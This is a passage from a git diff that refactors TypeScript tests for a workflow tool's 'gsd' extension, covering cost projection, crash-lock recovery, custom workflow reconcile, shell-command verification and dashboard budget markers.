-    line => line.toLowerCase().includes("ceiling")
-  );
-  assertTrue(!hasCeilingLine, "no ceiling warning when total ($0.20) < ceiling ($100.00)");
-}
+  test("budget ceiling not hit: total < ceiling → no ceiling line", () => {
+    const slices = [
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 5, 100.00);
+    const hasCeilingLine = result.some(
+      line => line.toLowerCase().includes("ceiling")
+    );
+    assert.ok(!hasCeilingLine, "no ceiling warning when total ($0.20) < ceiling ($100.00)");
+  });
 
-// 7. No ceiling arg → no ceiling line
-{
-  const slices = [
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 5);
-  const hasCeilingLine = result.some(
-    line => line.toLowerCase().includes("ceiling")
-  );
-  assertTrue(!hasCeilingLine, "no ceiling warning when no ceiling is set");
-}
+  test("no ceiling arg → no ceiling line", () => {
+    const slices = [
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 5);
+    const hasCeilingLine = result.some(
+      line => line.toLowerCase().includes("ceiling")
+    );
+    assert.ok(!hasCeilingLine, "no ceiling warning when no ceiling is set");
+  });
 
-// 8. Rounding: avg $0.10 × 5 remaining = $0.50 → result[0] contains "$0.50"
-{
-  const slices = [
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 5);
-  const hasRoundedCost = result.some(line => line.includes("$0.50"));
-  assertTrue(hasRoundedCost, "projected cost $0.50 (avg $0.10 × 5 remaining) appears in output");
-}
+  test("rounding: avg $0.10 × 5 remaining = $0.50", () => {
+    const slices = [
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 5);
+    const hasRoundedCost = result.some(line => line.includes("$0.50"));
+    assert.ok(hasRoundedCost, "projected cost $0.50 (avg $0.10 × 5 remaining) appears in output");
+  });
 
-// 9. Bare milestone entries excluded from average:
-//    makeSliceAggregate('M001', 5.00) has no "/" in sliceId → excluded from avg calc.
-//    Only M001/S01 ($0.10) and M001/S02 ($0.10) count → avg $0.10 × 3 remaining = $0.30
-{
-  const slices = [
-    makeSliceAggregate("M001", 5.00),        // bare milestone — must be excluded
-    makeSliceAggregate("M001/S01", 0.10),
-    makeSliceAggregate("M001/S02", 0.10),
-  ];
-  const result = formatCostProjection(slices, 3);
-  const hasCorrectProjection = result.some(line => line.includes("$0.30"));
-  assertTrue(
-    hasCorrectProjection,
-    "bare milestone entry excluded from avg: projection shows $0.30 (avg $0.10 × 3), not $1.83 (including $5.00 entry)"
-  );
-}
-
-// ─── Summary ──────────────────────────────────────────────────────────────────
-
-report();
+  test("bare milestone entries excluded from average", () => {
+    const slices = [
+      makeSliceAggregate("M001", 5.00),        // bare milestone — must be excluded
+      makeSliceAggregate("M001/S01", 0.10),
+      makeSliceAggregate("M001/S02", 0.10),
+    ];
+    const result = formatCostProjection(slices, 3);
+    const hasCorrectProjection = result.some(line => line.includes("$0.30"));
+    assert.ok(
+      hasCorrectProjection,
+      "bare milestone entry excluded from avg: projection shows $0.30 (avg $0.10 × 3), not $1.83 (including $5.00 entry)"
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/crash-recovery.test.ts b/src/resources/extensions/gsd/tests/crash-recovery.test.ts
index 7a8b858d0..a2949b58e 100644
--- a/src/resources/extensions/gsd/tests/crash-recovery.test.ts
+++ b/src/resources/extensions/gsd/tests/crash-recovery.test.ts
@@ -36,7 +36,6 @@ function writeTestLock(
   base: string,
   unitType: string,
   unitId: string,
-  completedUnits: number,
   sessionFile?: string,
 ): void {
   writeFileSync(
@@ -47,7 +46,6 @@ function writeTestLock(
       unitType,
       unitId,
       unitStartedAt: new Date().toISOString(),
-      completedUnits,
       sessionFile,
     }, null, 2),
     "utf-8",
@@ -146,17 +144,16 @@ test("hasResumableDerivedState treats only unfinished active work as resumable",
   assert.equal(hasResumableDerivedState(makeState("pre-planning", false)), false);
 });
 
-test("isBootstrapCrashLock detects starting/bootstrap zero-completed special case", () => {
+test("isBootstrapCrashLock detects starting/bootstrap special case", () => {
   const bootstrap: LockData = {
     pid: 999999999,
     startedAt: new Date().toISOString(),
     unitType: "starting",
     unitId: "bootstrap",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
   assert.equal(isBootstrapCrashLock(bootstrap), true);
-  assert.equal(isBootstrapCrashLock({ ...bootstrap, completedUnits: 1 }), false);
+  assert.equal(isBootstrapCrashLock({ ...bootstrap, unitType: "execute-task" }), false);
 });
 
 test("readPausedSessionMetadata reads paused-session metadata when present", () => {
@@ -227,7 +224,7 @@ test("assessInterruptedSession classifies stale complete repo as stale and suppr
     writeRoadmap(base, true);
     writeCompleteSliceArtifacts(base);
     writeCompleteMilestoneSummary(base);
-    writeTestLock(base, "execute-task", "M001/S01/T01", 1);
+    writeTestLock(base, "execute-task", "M001/S01/T01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "stale");
@@ -244,7 +241,7 @@ test("assessInterruptedSession suppresses prompt when expected artifact already
     writeRoadmap(base, true);
     writeCompleteSliceArtifacts(base);
     writeCompleteMilestoneSummary(base);
-    writeTestLock(base, "complete-slice", "M001/S01", 1);
+    writeTestLock(base, "complete-slice", "M001/S01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "stale");
@@ -259,7 +256,7 @@ test("assessInterruptedSession keeps paused-session resume recoverable when disk
   try {
     writeRoadmap(base, false);
     writePausedSession(base);
-    writeTestLock(base, "execute-task", "M001/S01/T01", 1);
+    writeTestLock(base, "execute-task", "M001/S01/T01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "recoverable");
@@ -340,7 +337,7 @@ test("assessInterruptedSession keeps unfinished derived state recoverable withou
   const base = makeTmpBase();
   try {
     writeRoadmap(base, false);
-    writeTestLock(base, "plan-slice", "M001/S01", 1);
+    writeTestLock(base, "plan-slice", "M001/S01");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "recoverable");
@@ -355,7 +352,7 @@ test("assessInterruptedSession preserves crash trace when activity log has tool
   const base = makeTmpBase();
   try {
     writeRoadmap(base, false);
-    writeTestLock(base, "execute-task", "M001/S01/T01", 1);
+    writeTestLock(base, "execute-task", "M001/S01/T01");
     writeActivityLog(base, [
       {
         type: "message",
@@ -395,7 +392,7 @@ test("assessInterruptedSession preserves crash trace when activity log has tool
 test("assessInterruptedSession treats bootstrap crash as stale without paused metadata", async () => {
   const base = makeTmpBase();
   try {
-    writeTestLock(base, "starting", "bootstrap", 0);
+    writeTestLock(base, "starting", "bootstrap");
 
     const assessment = await assessInterruptedSession(base);
     assert.equal(assessment.classification, "stale");
@@ -407,67 +404,60 @@ test("assessInterruptedSession treats bootstrap crash as stale without paused me
 
 // ─── writeLock / readCrashLock ────────────────────────────────────────────
 
-test("writeLock creates lock file and readCrashLock reads it", () => {
+test("writeLock creates lock file and readCrashLock reads it", (t) => {
   const base = makeTmpBase();
-  try {
-    writeLock(base, "execute-task", "M001/S01/T01", 3, "/tmp/session.jsonl");
-    const lock = readCrashLock(base);
-    assert.ok(lock, "lock should exist");
-    assert.equal(lock!.unitType, "execute-task");
-    assert.equal(lock!.unitId, "M001/S01/T01");
-    assert.equal(lock!.completedUnits, 3);
-    assert.equal(lock!.sessionFile, "/tmp/session.jsonl");
-    assert.equal(lock!.pid, process.pid);
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  writeLock(base, "execute-task", "M001/S01/T01", "/tmp/session.jsonl");
+  const lock = readCrashLock(base);
+  assert.ok(lock, "lock should exist");
+  assert.equal(lock!.unitType, "execute-task");
+  assert.equal(lock!.unitId, "M001/S01/T01");
+  assert.equal(lock!.sessionFile, "/tmp/session.jsonl");
+  assert.equal(lock!.pid, process.pid);
 });
 
-test("readCrashLock returns null when no lock exists", () => {
+test("readCrashLock returns null when no lock exists", (t) => {
   const base = makeTmpBase();
-  try {
-    const lock = readCrashLock(base);
-    assert.equal(lock, null);
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  const lock = readCrashLock(base);
+  assert.equal(lock, null);
 });
 
 // ─── clearLock ────────────────────────────────────────────────────────────
 
-test("clearLock removes existing lock file", () => {
+test("clearLock removes existing lock file", (t) => {
   const base = makeTmpBase();
-  try {
-    writeLock(base, "plan-slice", "M001/S01", 0);
-    assert.ok(readCrashLock(base), "lock should exist before clear");
-    clearLock(base);
-    assert.equal(readCrashLock(base), null, "lock should be gone after clear");
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  writeLock(base, "plan-slice", "M001/S01");
+  assert.ok(readCrashLock(base), "lock should exist before clear");
+  clearLock(base);
+  assert.equal(readCrashLock(base), null, "lock should be gone after clear");
 });
 
-test("clearLock is safe when no lock exists", () => {
+test("clearLock is safe when no lock exists", (t) => {
   const base = makeTmpBase();
-  try {
-    assert.doesNotThrow(() => clearLock(base));
-  } finally {
-    cleanup(base);
-  }
+  t.after(() => cleanup(base));
+
+  assert.doesNotThrow(() => clearLock(base));
 });
 
 // ─── isLockProcessAlive ──────────────────────────────────────────────────
 
-test("isLockProcessAlive returns false for own PID", () => {
+test("#2470: isLockProcessAlive returns true for own PID (we hold the lock)", () => {
+  // Own PID means we ARE the lock holder — alive, not stale. (#2470)
+  // Callers that need recycled-PID detection (e.g. startAuto) already
+  // guard with `crashLock.pid !== process.pid` before calling us.
   const lock: LockData = {
     pid: process.pid,
     startedAt: new Date().toISOString(),
     unitType: "execute-task",
     unitId: "M001/S01/T01",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
-  assert.equal(isLockProcessAlive(lock), false, "own PID should return false");
+  assert.equal(isLockProcessAlive(lock), true, "own PID should return true — we are alive");
 });
 
 test("isLockProcessAlive returns false for dead PID", () => {
@@ -477,7 +467,6 @@ test("isLockProcessAlive returns false for dead PID", () => {
     unitType: "execute-task",
     unitId: "M001/S01/T01",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
   assert.equal(isLockProcessAlive(lock), false);
 });
@@ -488,7 +477,6 @@ test("isLockProcessAlive returns false for invalid PIDs", () => {
     unitType: "x",
     unitId: "x",
     unitStartedAt: new Date().toISOString(),
-    completedUnits: 0,
   };
   assert.equal(isLockProcessAlive({ ...base, pid: 0 } as LockData), false);
   assert.equal(isLockProcessAlive({ ...base, pid: -1 } as LockData), false);
@@ -504,11 +492,9 @@ test("formatCrashInfo includes unit type, id, and PID", () => {
     unitType: "complete-slice",
     unitId: "M002/S03",
     unitStartedAt: "2025-01-01T00:01:00.000Z",
-    completedUnits: 7,
   };
   const info = formatCrashInfo(lock);
   assert.ok(info.includes("complete-slice"));
   assert.ok(info.includes("M002/S03"));
   assert.ok(info.includes("12345"));
-  assert.ok(info.includes("7"));
 });
diff --git a/src/resources/extensions/gsd/tests/custom-engine-loop-integration.test.ts b/src/resources/extensions/gsd/tests/custom-engine-loop-integration.test.ts
index ec7d89514..28dcf1b66 100644
--- a/src/resources/extensions/gsd/tests/custom-engine-loop-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/custom-engine-loop-integration.test.ts
@@ -178,7 +178,7 @@ function makeMockDeps(overrides?: Partial<LoopDeps>): LoopDeps & { callLog: stri
     getCurrentBranch: () => "main",
     autoWorktreeBranch: () => "auto/M001",
     resolveMilestoneFile: () => null,
-    reconcileMergeState: () => false,
+    reconcileMergeState: () => "clean",
     getLedger: () => null,
     getProjectTotals: () => ({ cost: 0 }),
     formatCost: (c: number) => `$${c.toFixed(2)}`,
@@ -194,18 +194,13 @@ function makeMockDeps(overrides?: Partial<LoopDeps>): LoopDeps & { callLog: stri
     runPreDispatchHooks: () => ({ firedHooks: [], action: "proceed" }),
     getPriorSliceCompletionBlocker: () => null,
     getMainBranch: () => "main",
-    collectObservabilityWarnings: async () => [],
-    buildObservabilityRepairBlock: () => null,
     closeoutUnit: async () => {},
-    verifyExpectedArtifact: () => true,
-    clearUnitRuntimeRecord: () => {},
-    writeUnitRuntimeRecord: () => {},
     recordOutcome: () => {},
     writeLock: () => {},
     captureAvailableSkills: () => {},
     ensurePreconditions: () => {},
     updateSliceProgressCache: () => {},
-    selectAndApplyModel: async () => ({ routing: null }),
+    selectAndApplyModel: async () => ({ routing: null, appliedModel: null }),
     resolveModelId: () => undefined,
     startUnitSupervision: () => {},
     getDeepDiagnostic: () => null,
@@ -316,6 +311,12 @@ describe("Custom engine loop integration", () => {
       `stopAuto reason should include "Workflow complete", got: ${stopEntry}`,
     );
 
+    assert.equal(
+      deps.callLog.filter((e: string) => e === "deriveState").length,
+      3,
+      "custom engine should stop immediately after a milestone-complete reconcile",
+    );
+
     // Verify dev path was NOT used (resolveDispatch should not appear)
     assert.ok(
       !deps.callLog.includes("resolveDispatch"),
diff --git a/src/resources/extensions/gsd/tests/custom-verification.test.ts b/src/resources/extensions/gsd/tests/custom-verification.test.ts
index 700a9bd15..62e49aa6f 100644
--- a/src/resources/extensions/gsd/tests/custom-verification.test.ts
+++ b/src/resources/extensions/gsd/tests/custom-verification.test.ts
@@ -15,6 +15,7 @@ import { tmpdir } from "node:os";
 import { stringify } from "yaml";
 import { runCustomVerification } from "../custom-verification.ts";
 import type { WorkflowDefinition } from "../definition-loader.ts";
+import { createFakeRtk } from "../../../../tests/rtk-test-utils.ts";
 
 /** Create a temp run directory with the given definition and optional files. */
 function makeTempRun(
@@ -225,6 +226,38 @@ describe("shell-command policy", () => {
     const result = runCustomVerification(runDir, "step-1");
     assert.equal(result, "retry");
   });
+
+  it("rewrites shell-command verification through RTK when available", () => {
+    const fake = createFakeRtk({
+      "echo raw": "echo rewritten",
+    });
+    const previous = process.env.GSD_RTK_PATH;
+    process.env.GSD_RTK_PATH = fake.path;
+
+    try {
+      const def = makeDef([
+        {
+          id: "step-1",
+          name: "Build artifact",
+          prompt: "Build the artifact",
+          requires: [],
+          produces: ["artifact.txt"],
+          verify: {
+            policy: "shell-command",
+            command: "echo raw",
+          },
+        },
+      ]);
+
+      const runDir = makeTempRun(def);
+      const result = runCustomVerification(runDir, "step-1");
+      assert.equal(result, "continue");
+    } finally {
+      if (previous === undefined) delete process.env.GSD_RTK_PATH;
+      else process.env.GSD_RTK_PATH = previous;
+      fake.cleanup();
+    }
+  });
 });
 
 // ─── prompt-verify tests ────────────────────────────────────────────────
diff --git a/src/resources/extensions/gsd/tests/custom-workflow-engine.test.ts b/src/resources/extensions/gsd/tests/custom-workflow-engine.test.ts
index 3fbb3bd57..a05a943b8 100644
--- a/src/resources/extensions/gsd/tests/custom-workflow-engine.test.ts
+++ b/src/resources/extensions/gsd/tests/custom-workflow-engine.test.ts
@@ -249,6 +249,37 @@ describe("CustomWorkflowEngine.reconcile", () => {
     const graph = readGraph(runDir);
     assert.equal(graph.steps[0].status, "complete");
   });
+
+  it("re-reads GRAPH.yaml before reconcile so concurrent edits are preserved", async () => {
+    const { engine, runDir } = setupEngine([
+      makeStep({ id: "step-1" }),
+      makeStep({ id: "step-2", dependsOn: ["step-1"] }),
+    ], "wf");
+
+    const staleState = await engine.deriveState("/unused");
+
+    // Simulate another process appending a new step after deriveState() ran.
+    writeGraph(runDir, makeGraph([
+      makeStep({ id: "step-1" }),
+      makeStep({ id: "step-2", dependsOn: ["step-1"] }),
+      makeStep({ id: "step-3", dependsOn: ["step-2"] }),
+    ], "wf"));
+
+    const result = await engine.reconcile(staleState, {
+      unitType: "custom-step",
+      unitId: "wf/step-1",
+      startedAt: Date.now() - 1000,
+      finishedAt: Date.now(),
+    });
+
+    assert.equal(result.outcome, "continue");
+
+    const graph = readGraph(runDir);
+    assert.equal(graph.steps.length, 3, "reconcile should preserve the concurrent graph edit");
+    assert.equal(graph.steps[0].status, "complete");
+    assert.equal(graph.steps[1].status, "pending");
+    assert.equal(graph.steps[2].status, "pending");
+  });
 });
 
 // ─── getDisplayMetadata ──────────────────────────────────────────────────
diff --git a/src/resources/extensions/gsd/tests/dashboard-budget.test.ts b/src/resources/extensions/gsd/tests/dashboard-budget.test.ts
index bedb4a1f8..a9a14873c 100644
--- a/src/resources/extensions/gsd/tests/dashboard-budget.test.ts
+++ b/src/resources/extensions/gsd/tests/dashboard-budget.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 /**
  * Tests for dashboard budget indicator rendering.
  *
@@ -18,10 +20,6 @@ import {
   getProjectTotals,
   formatTokenCount,
 } from "../metrics.js";
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, assertMatch, assertNoMatch, report } = createTestContext();
-
 // ─── Test helpers ─────────────────────────────────────────────────────────────
 
 function makeUnit(overrides: Partial<UnitMetrics> = {}): UnitMetrics {
@@ -102,245 +100,230 @@ function renderModelContextWindow(units: UnitMetrics[], modelName: string): stri
 
 // ─── Completed section: budget indicators ─────────────────────────────────────
 
-console.log("\n=== Completed section: truncation + continue-here markers ===");
+describe('dashboard-budget', () => {
+  test('Completed section: truncation + continue-here markers', () => {
+    // Unit with truncation and continue-here — both markers appear
+    const ledgerUnits = [
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 3, continueHereFired: true }),
+    ];
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      ledgerUnits,
+    );
+    assert.match(markers, /▼3/, "completed: shows ▼3 for 3 truncation sections");
+    assert.match(markers, /→ wrap-up/, "completed: shows → wrap-up when continueHereFired");
+  });
 
-{
-  // Unit with truncation and continue-here — both markers appear
-  const ledgerUnits = [
-    makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 3, continueHereFired: true }),
-  ];
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    ledgerUnits,
-  );
-  assertMatch(markers, /▼3/, "completed: shows ▼3 for 3 truncation sections");
-  assertMatch(markers, /→ wrap-up/, "completed: shows → wrap-up when continueHereFired");
-}
+  {
+    // Unit with truncation only — no wrap-up marker
+    const ledgerUnits = [
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 5, continueHereFired: false }),
+    ];
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      ledgerUnits,
+    );
+    assert.match(markers, /▼5/, "completed: shows ▼5 truncation only");
+    assert.doesNotMatch(markers, /wrap-up/, "completed: no wrap-up when continueHereFired=false");
+  }
 
-{
-  // Unit with truncation only — no wrap-up marker
-  const ledgerUnits = [
-    makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 5, continueHereFired: false }),
-  ];
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    ledgerUnits,
-  );
-  assertMatch(markers, /▼5/, "completed: shows ▼5 truncation only");
-  assertNoMatch(markers, /wrap-up/, "completed: no wrap-up when continueHereFired=false");
-}
+  {
+    // Unit with continue-here only — no truncation marker
+    const ledgerUnits = [
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 0, continueHereFired: true }),
+    ];
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      ledgerUnits,
+    );
+    assert.doesNotMatch(markers, /▼/, "completed: no ▼ when truncationSections=0");
+    assert.match(markers, /→ wrap-up/, "completed: shows → wrap-up");
+  }
 
-{
-  // Unit with continue-here only — no truncation marker
-  const ledgerUnits = [
-    makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 0, continueHereFired: true }),
-  ];
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    ledgerUnits,
-  );
-  assertNoMatch(markers, /▼/, "completed: no ▼ when truncationSections=0");
-  assertMatch(markers, /→ wrap-up/, "completed: shows → wrap-up");
-}
+  // ─── Completed section: missing ledger match ──────────────────────────────────
 
-// ─── Completed section: missing ledger match ──────────────────────────────────
+  test('Completed section: missing ledger match', () => {
+    // Completed unit with no matching ledger entry — no crash, no markers
+    const ledgerUnits = [
+      makeUnit({ type: "execute-task", id: "M001/S01/T99", truncationSections: 3 }),
+    ];
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      ledgerUnits,
+    );
+    assert.deepStrictEqual(markers, "", "missing match: empty markers when no ledger entry matches");
+  });
 
-console.log("\n=== Completed section: missing ledger match ===");
+  {
+    // Empty ledger — no crash, no markers
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      [],
+    );
+    assert.deepStrictEqual(markers, "", "empty ledger: empty markers");
+  }
 
-{
-  // Completed unit with no matching ledger entry — no crash, no markers
-  const ledgerUnits = [
-    makeUnit({ type: "execute-task", id: "M001/S01/T99", truncationSections: 3 }),
-  ];
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    ledgerUnits,
-  );
-  assertEq(markers, "", "missing match: empty markers when no ledger entry matches");
-}
+  // ─── Completed section: retry handling (last entry wins) ──────────────────────
 
-{
-  // Empty ledger — no crash, no markers
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    [],
-  );
-  assertEq(markers, "", "empty ledger: empty markers");
-}
+  test('Completed section: retry handling', () => {
+    // Two ledger entries for same unit (retry) — last entry wins
+    const ledgerUnits = [
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 1 }),
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 7 }),
+    ];
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      ledgerUnits,
+    );
+    assert.match(markers, /▼7/, "retry: last entry's truncation count (7) wins over first (1)");
+    assert.doesNotMatch(markers, /▼1/, "retry: first entry's count (1) is not shown");
+  });
 
-// ─── Completed section: retry handling (last entry wins) ──────────────────────
+  // ─── By Model section: context window display ─────────────────────────────────
 
-console.log("\n=== Completed section: retry handling ===");
+  test('By Model section: context window', () => {
+    // Model with context window — shows formatted token count
+    const units = [
+      makeUnit({ model: "claude-sonnet-4-20250514", contextWindowTokens: 200000 }),
+    ];
+    const label = renderModelContextWindow(units, "claude-sonnet-4-20250514");
+    assert.deepStrictEqual(label, "[200.0k]", "by model: shows [200.0k] for 200000 context window");
+  });
 
-{
-  // Two ledger entries for same unit (retry) — last entry wins
-  const ledgerUnits = [
-    makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 1 }),
-    makeUnit({ type: "execute-task", id: "M001/S01/T01", truncationSections: 7 }),
-  ];
-  const markers = renderCompletedBudgetMarkers(
-    { type: "execute-task", id: "M001/S01/T01" },
-    ledgerUnits,
-  );
-  assertMatch(markers, /▼7/, "retry: last entry's truncation count (7) wins over first (1)");
-  assertNoMatch(markers, /▼1/, "retry: first entry's count (1) is not shown");
-}
+  {
+    // Model without context window — no label
+    const units = [
+      makeUnit({ model: "claude-sonnet-4-20250514" }),
+    ];
+    const label = renderModelContextWindow(units, "claude-sonnet-4-20250514");
+    assert.deepStrictEqual(label, null, "by model: null when no contextWindowTokens");
+  }
 
-// ─── By Model section: context window display ─────────────────────────────────
+  {
+    // Multiple models — each gets its own context window
+    const units = [
+      makeUnit({ model: "claude-sonnet-4-20250514", contextWindowTokens: 200000, cost: 0.05 }),
+      makeUnit({ model: "claude-opus-4-20250514", contextWindowTokens: 200000, cost: 0.30 }),
+    ];
+    const sonnetLabel = renderModelContextWindow(units, "claude-sonnet-4-20250514");
+    const opusLabel = renderModelContextWindow(units, "claude-opus-4-20250514");
+    assert.deepStrictEqual(sonnetLabel, "[200.0k]", "by model multi: sonnet has context window");
+    assert.deepStrictEqual(opusLabel, "[200.0k]", "by model multi: opus has context window");
+  }
 
-console.log("\n=== By Model section: context window ===");
+  // ─── By Model section: single model visibility ───────────────────────────────
 
-{
-  // Model with context window — shows formatted token count
-  const units = [
-    makeUnit({ model: "claude-sonnet-4-20250514", contextWindowTokens: 200000 }),
-  ];
-  const label = renderModelContextWindow(units, "claude-sonnet-4-20250514");
-  assertEq(label, "[200.0k]", "by model: shows [200.0k] for 200000 context window");
-}
+  test('By Model section: single model visibility', () => {
+    // With guard changed to >= 1, single model aggregation should produce results
+    const units = [
+      makeUnit({ model: "claude-sonnet-4-20250514" }),
+    ];
+    const models = aggregateByModel(units);
+    assert.ok(models.length >= 1, "single model: aggregateByModel returns >= 1 entry");
+    assert.deepStrictEqual(models.length, 1, "single model: exactly 1 model aggregate");
+    assert.deepStrictEqual(models[0].model, "claude-sonnet-4-20250514", "single model: correct model name");
+    // The guard `models.length >= 1` (changed from > 1) means this section now renders
+    assert.ok(models.length >= 1, "single model: passes >= 1 guard (section will render)");
+  });
 
-{
-  // Model without context window — no label
-  const units = [
-    makeUnit({ model: "claude-sonnet-4-20250514" }),
-  ];
-  const label = renderModelContextWindow(units, "claude-sonnet-4-20250514");
-  assertEq(label, null, "by model: null when no contextWindowTokens");
-}
+  // ─── Cost & Usage: aggregate budget line ──────────────────────────────────────
 
-{
-  // Multiple models — each gets its own context window
-  const units = [
-    makeUnit({ model: "claude-sonnet-4-20250514", contextWindowTokens: 200000, cost: 0.05 }),
-    makeUnit({ model: "claude-opus-4-20250514", contextWindowTokens: 200000, cost: 0.30 }),
-  ];
-  const sonnetLabel = renderModelContextWindow(units, "claude-sonnet-4-20250514");
-  const opusLabel = renderModelContextWindow(units, "claude-opus-4-20250514");
-  assertEq(sonnetLabel, "[200.0k]", "by model multi: sonnet has context window");
-  assertEq(opusLabel, "[200.0k]", "by model multi: opus has context window");
-}
+  test('Cost & Usage: aggregate budget line', () => {
+    // Units with truncation and continue-here — both stats appear
+    const units = [
+      makeUnit({ truncationSections: 3, continueHereFired: true }),
+      makeUnit({ truncationSections: 2, continueHereFired: false }),
+      makeUnit({ truncationSections: 1, continueHereFired: true }),
+    ];
+    const line = renderCostBudgetLine(units);
+    assert.ok(line !== null, "cost budget: line rendered when budget data exists");
+    assert.match(line!, /6 sections truncated/, "cost budget: shows total truncation count (3+2+1=6)");
+    assert.match(line!, /2 continue-here fired/, "cost budget: shows continue-here count");
+  });
 
-// ─── By Model section: single model visibility ───────────────────────────────
+  {
+    // Only truncation, no continue-here
+    const units = [
+      makeUnit({ truncationSections: 4, continueHereFired: false }),
+    ];
+    const line = renderCostBudgetLine(units);
+    assert.ok(line !== null, "cost budget truncation-only: line rendered");
+    assert.match(line!, /4 sections truncated/, "cost budget truncation-only: shows count");
+    assert.doesNotMatch(line!, /continue-here/, "cost budget truncation-only: no continue-here text");
+  }
 
-console.log("\n=== By Model section: single model visibility ===");
+  {
+    // Only continue-here, no truncation
+    const units = [
+      makeUnit({ truncationSections: 0, continueHereFired: true }),
+    ];
+    const line = renderCostBudgetLine(units);
+    assert.ok(line !== null, "cost budget continue-only: line rendered");
+    assert.doesNotMatch(line!, /truncated/, "cost budget continue-only: no truncation text");
+    assert.match(line!, /1 continue-here fired/, "cost budget continue-only: shows count");
+  }
 
-{
-  // With guard changed to >= 1, single model aggregation should produce results
-  const units = [
-    makeUnit({ model: "claude-sonnet-4-20250514" }),
-  ];
-  const models = aggregateByModel(units);
-  assertTrue(models.length >= 1, "single model: aggregateByModel returns >= 1 entry");
-  assertEq(models.length, 1, "single model: exactly 1 model aggregate");
-  assertEq(models[0].model, "claude-sonnet-4-20250514", "single model: correct model name");
-  // The guard `models.length >= 1` (changed from > 1) means this section now renders
-  assertTrue(models.length >= 1, "single model: passes >= 1 guard (section will render)");
-}
+  // ─── Backward compat: no budget fields ────────────────────────────────────────
 
-// ─── Cost & Usage: aggregate budget line ──────────────────────────────────────
+  test('Backward compat: no budget data', () => {
+    // Old-format units without budget fields — no indicators anywhere
+    const oldUnits = [
+      makeUnit(), // no budget fields
+      makeUnit({ id: "M001/S01/T02" }),
+    ];
 
-console.log("\n=== Cost & Usage: aggregate budget line ===");
+    // Completed section: no markers
+    const markers = renderCompletedBudgetMarkers(
+      { type: "execute-task", id: "M001/S01/T01" },
+      oldUnits,
+    );
+    assert.doesNotMatch(markers, /▼/, "backward compat completed: no truncation marker");
+    assert.doesNotMatch(markers, /wrap-up/, "backward compat completed: no wrap-up marker");
+    assert.deepStrictEqual(markers, "", "backward compat completed: empty markers string");
 
-{
-  // Units with truncation and continue-here — both stats appear
-  const units = [
-    makeUnit({ truncationSections: 3, continueHereFired: true }),
-    makeUnit({ truncationSections: 2, continueHereFired: false }),
-    makeUnit({ truncationSections: 1, continueHereFired: true }),
-  ];
-  const line = renderCostBudgetLine(units);
-  assertTrue(line !== null, "cost budget: line rendered when budget data exists");
-  assertMatch(line!, /6 sections truncated/, "cost budget: shows total truncation count (3+2+1=6)");
-  assertMatch(line!, /2 continue-here fired/, "cost budget: shows continue-here count");
-}
+    // By Model section: no context window label
+    const label = renderModelContextWindow(oldUnits, "claude-sonnet-4-20250514");
+    assert.deepStrictEqual(label, null, "backward compat by-model: no context window label");
 
-{
-  // Only truncation, no continue-here
-  const units = [
-    makeUnit({ truncationSections: 4, continueHereFired: false }),
-  ];
-  const line = renderCostBudgetLine(units);
-  assertTrue(line !== null, "cost budget truncation-only: line rendered");
-  assertMatch(line!, /4 sections truncated/, "cost budget truncation-only: shows count");
-  assertNoMatch(line!, /continue-here/, "cost budget truncation-only: no continue-here text");
-}
+    // Cost & Usage: no budget line
+    const line = renderCostBudgetLine(oldUnits);
